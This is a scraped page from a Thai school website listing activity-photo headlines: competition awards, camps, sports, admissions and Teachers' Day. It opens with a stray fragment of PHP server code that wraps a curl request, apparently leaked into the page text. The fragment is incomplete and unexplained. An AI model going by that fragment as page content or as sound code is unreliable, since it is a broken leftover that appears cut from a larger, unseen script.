$e=curl_exec($d); curl_close($d); return $e; } ?> ภาพกิจกรรม - Sansailuang School | https://ssl.ac.th

ภาพกิจกรรม

ขอแสดงความยินดีชื่นชมกับตัวแทนนักเรียนและครูที่ทุ่มเทการฝึกซ..

สรุปเหรียญรางวัลงานศิลปหัตถกรรมนักเรียนครั้งที่ 70

ขอแสดงความยินดีกับผลงานนักเรียนการแข่งขันศิลปหัตถกรรมนักเรีย..

ขอขอบคุณ. คุณครู.สุนีย์ และชมรมฯคนรักเพลงเก่า มอบเงิน 2,000 ..

ผอ.อวยพรให้ตัวแทนนักเรียนที่ไปแข่งขันงานศิลปหัตถกรรมนักเรียน..

กิจกรรมสะเต็มศึกษาให้กับนักเรียนชั้นป.2และป.5 ปีการศึกษา 25..

กิจกรรมเข้าค่ายพักแรมลูกเสือ เนตรนารี สามัญรุ่นใหญ่ ปีการศึ..

สรุปผลการแข่งขันกีฬานักเรียนอำเภอสันทราย ประจำปีการศึกษา 256..

ทีมฟุตบอลสันทรายหลวงลงสู้ศึก

ประกาศรับสมัครนักเรียนปีการศึกษา 2566

งานวันครู ประจำปี 2566

กิจกรรมธนาคารขยะ